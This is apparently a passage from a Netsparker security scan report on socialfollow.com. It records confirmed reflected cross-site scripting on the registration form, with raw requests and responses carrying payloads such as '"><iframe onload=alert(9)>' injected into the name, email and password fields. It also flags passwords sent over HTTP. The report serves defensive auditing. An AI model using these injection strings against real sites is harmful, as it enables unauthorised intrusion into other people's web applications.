Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:44 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6220
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" 
class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <p style="color: red;">The "Email" field must contain a valid email address.<br />The "Password" field must have at least 4 characters.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[Current length = 1]<br /></p> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="Smith" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><body onload=netsparker(9)>" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="3" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" value="agree" checked="checked" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" 
src="/images/btn_sign-up.gif" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");document.fRegister.tEmail.style.borderColor = '#FF0000';document.fRegister.tPassword.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /register.php

/register.php CONFIRMED

http://www.socialfollow.com/register.php

Parameters

Parameter Type Value
cbNewsletter POST 1
cbTerms POST agree
submit POST 3
tEmail POST netsparker@example.com
tName POST "><iframe onload=alert(9)>
tPassword POST 3
tRePassword POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Content-Length: 143
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cbNewsletter=1&cbTerms=agree&submit=3&tEmail=netsparker%40example.com&tName=%22%3e%3ciframe+onload%3dnetsparker(9)%3e&tPassword=3&tRePassword=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:48:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6123
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" 
class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <p style="color: red;">The "Password" field must have at least 4 characters.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[Current length = 1]<br /></p> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="netsparker@example.com" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="3" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" value="agree" checked="checked" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" /></td> </tr> 
</table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");document.fRegister.tPassword.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /register.php

/register.php CONFIRMED

http://www.socialfollow.com/register.php

Parameters

Parameter Type Value
cbNewsletter POST 1
cbTerms POST agree
submit POST 3
tEmail POST netsparker@example.com
tName POST Smith
tPassword POST "><iframe onload=alert(9)>
tRePassword POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Content-Length: 147
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cbNewsletter=1&cbTerms=agree&submit=3&tEmail=netsparker%40example.com&tName=Smith&tPassword=%22%3e%3ciframe+onload%3dnetsparker(9)%3e&tRePassword=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:54:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6031
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" 
class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <p style="color: red;">The Password fields must match.<br /></p> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="Smith" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="netsparker@example.com" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" value="agree" checked="checked" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new 
Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");document.fRegister.tPassword|tRePassword.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic, he or she can steal users' credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting with the login process, should be served only over HTTPS.
- /sitemap.php

/sitemap.php CONFIRMED

http://www.socialfollow.com/sitemap.php

Form target action

/login.php

Request

GET /sitemap.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Sitemap | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><style type="text/css">div.left ul { margin-left: 15px; list-style-type: disc; } div.left ul li { padding-bottom: 5px; }</style><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> 
</div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1 class="title">Sitemap</h1> <ul class="sitemaptext"><li><a href="/" title="Home">Home</a></li><li><a href="/blog/" title="Blog">Blog</a></li><li><a href="/profiles/" title="Profiles">Profiles</a></li><li><a href="/login.php" title="Login">Login</a></li><li><a href="/contact-us.php" title="Contact Us">Contact Us</a></li><li><a href="/sitemap.php" title="Sitemap">Sitemap</a></li><li>Blog</li><li style="list-style-type: none;"><ul><li>2009</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/03/" title="03">03</a></li><li><a href="/blog/2009/04/" title="04">04</a></li><li><a href="/blog/2009/06/" title="06">06</a></li><li>06</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/06/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/07/" title="07">07</a></li><li>07</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/07/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/08/" title="08">08</a></li></ul></li><li>Categories</li><li style="list-style-type: none;"><ul><li><a href="/blog/c/featured/" title="Featured">Featured</a></li><li><a href="/blog/c/future-features/" title="Future-features">Future-features</a></li><li><a href="/blog/c/new-releases/" title="New-releases">New-releases</a></li><li><a href="/blog/c/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/c/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li></ul></li><li>Featured</li><li style="list-style-type: none;"><ul><li><a 
href="/blog/featured/social-follow-creator-interviewed/" title="Social-follow-creator-interviewed">Social-follow-creator-interviewed</a></li><li><a href="/blog/featured/social-follow-featured-on-blogger-institute/" title="Social-follow-featured-on-blogger-institute">Social-follow-featured-on-blogger-institute</a></li><li><a href="/blog/featured/social-follow-featured-on-fine-art-of-blogging/" title="Social-follow-featured-on-fine-art-of-blogging">Social-follow-featured-on-fine-art-of-blogging</a></li><li><a href="/blog/featured/social-follow-featured-on-go2web20net/" title="Social-follow-featured-on-go2web20net">Social-follow-featured-on-go2web20net</a></li><li><a href="/blog/featured/social-follow-featured-on-killerstartups/" title="Social-follow-featured-on-killerstartups">Social-follow-featured-on-killerstartups</a></li><li><a href="/blog/featured/social-follow-featured-on-ziipa-vote-for-us/" title="Social-follow-featured-on-ziipa-vote-for-us">Social-follow-featured-on-ziipa-vote-for-us</a></li><li><a href="/blog/featured/visionwiz-blogs-about-socialfollowcom/" title="Visionwiz-blogs-about-socialfollowcom">Visionwiz-blogs-about-socialfollowcom</a></li><li><a href="/blog/featured/vote-for-social-follow-on-listio-com/" title="Vote-for-social-follow-on-listio-com">Vote-for-social-follow-on-listio-com</a></li></ul></li><li>Future Features</li><li style="list-style-type: none;"><ul><li><a href="/blog/future-features/social-follow-profile-pages-coming-soon/" title="Social-follow-profile-pages-coming-soon">Social-follow-profile-pages-coming-soon</a></li></ul></li><li>New Releases</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/server-upgrade-for-social-follow/" title="Server-upgrade-for-social-follow">Server-upgrade-for-social-follow</a></li><li><a href="/blog/new-releases/social-follow-almost-launched/" title="Social-follow-almost-launched">Social-follow-almost-launched</a></li><li><a href="/blog/new-releases/social-follow-button-user-flow/" 
title="Social-follow-button-user-flow">Social-follow-button-user-flow</a></li><li><a href="/blog/new-releases/social-follow-expanded/" title="Social-follow-expanded">Social-follow-expanded</a></li><li><a href="/blog/new-releases/social-follow-expands-internationally/" title="Social-follow-expands-internationally">Social-follow-expands-internationally</a></li><li><a href="/blog/new-releases/social-follow-launches/" title="Social-follow-launches">Social-follow-launches</a></li><li><a href="/blog/new-releases/social-follow-profiles-officially-launched/" title="Social-follow-profiles-officially-launched">Social-follow-profiles-officially-launched</a></li><li><a href="/blog/new-releases/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/" title="Wordpress-plugin-for-social-follow">Wordpress-plugin-for-social-follow</a></li><li>Wordpress Plugin For Social Follow</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/comment-page-1/" title="Comment-page-1">Comment-page-1</a></li></ul></li></ul></li><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/page/2/" title="2">2</a></li><li><a href="/blog/page/3/" title="3">3</a></li></ul></li><li>Social Following</li><li style="list-style-type: none;"><ul><li><a href="/blog/social-following/definition-of-social-follow/" title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/social-following/social-follow-joins-twitter/" title="Social-follow-joins-twitter">Social-follow-joins-twitter</a></li></ul></li><li>Tag</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/analytics/" title="Analytics">Analytics</a></li><li><a href="/blog/tag/blogger-institute/" title="Blogger-institute">Blogger-institute</a></li><li><a href="/blog/tag/definition-of-social-follow/" 
title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/tag/featured/" title="Featured">Featured</a></li><li><a href="/blog/tag/fine-art-of-blogging/" title="Fine-art-of-blogging">Fine-art-of-blogging</a></li><li><a href="/blog/tag/follow-me-button/" title="Follow-me-button">Follow-me-button</a></li><li><a href="/blog/tag/go2web20net/" title="Go2web20net">Go2web20net</a></li><li><a href="/blog/tag/interview/" title="Interview">Interview</a></li><li><a href="/blog/tag/kerry-jones/" title="Kerry-jones">Kerry-jones</a></li><li><a href="/blog/tag/killerstartupscom/" title="Killerstartupscom">Killerstartupscom</a></li><li><a href="/blog/tag/multiple-languages/" title="Multiple-languages">Multiple-languages</a></li><li><a href="/blog/tag/new-feature/" title="New-feature">New-feature</a></li><li><a href="/blog/tag/new-release/" title="New-release">New-release</a></li><li><a href="/blog/tag/plugin/" title="Plugin">Plugin</a></li><li><a href="/blog/tag/rafferty-pendery/" title="Rafferty-pendery">Rafferty-pendery</a></li><li><a href="/blog/tag/raffy-pendery/" title="Raffy-pendery">Raffy-pendery</a></li><li><a href="/blog/tag/reputation-management/" title="Reputation-management">Reputation-management</a></li><li><a href="/blog/tag/social-follow-button/" title="Social-follow-button">Social-follow-button</a></li><li><a href="/blog/tag/social-follow-featured/" title="Social-follow-featured">Social-follow-featured</a></li><li><a href="/blog/tag/social-follow-new-releases/" title="Social-follow-new-releases">Social-follow-new-releases</a></li><li><a href="/blog/tag/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/tag/social-follow-user-flow/" title="Social-follow-user-flow">Social-follow-user-flow</a></li><li><a href="/blog/tag/social-follow/" title="Social-follow">Social-follow</a></li><li>Social Follow</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: 
none;"><ul><li><a href="/blog/tag/social-follow/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/tag/social-networking-profiles/" title="Social-networking-profiles">Social-networking-profiles</a></li><li><a href="/blog/tag/social-networks/" title="Social-networks">Social-networks</a></li><li><a href="/blog/tag/social-profiles/" title="Social-profiles">Social-profiles</a></li><li><a href="/blog/tag/studio98/" title="Studio98">Studio98</a></li><li><a href="/blog/tag/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/twitter-feed/" title="Twitter-feed">Twitter-feed</a></li><li><a href="/blog/tag/twitter/" title="Twitter">Twitter</a></li><li>Twitter</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/twitter/page/2/" 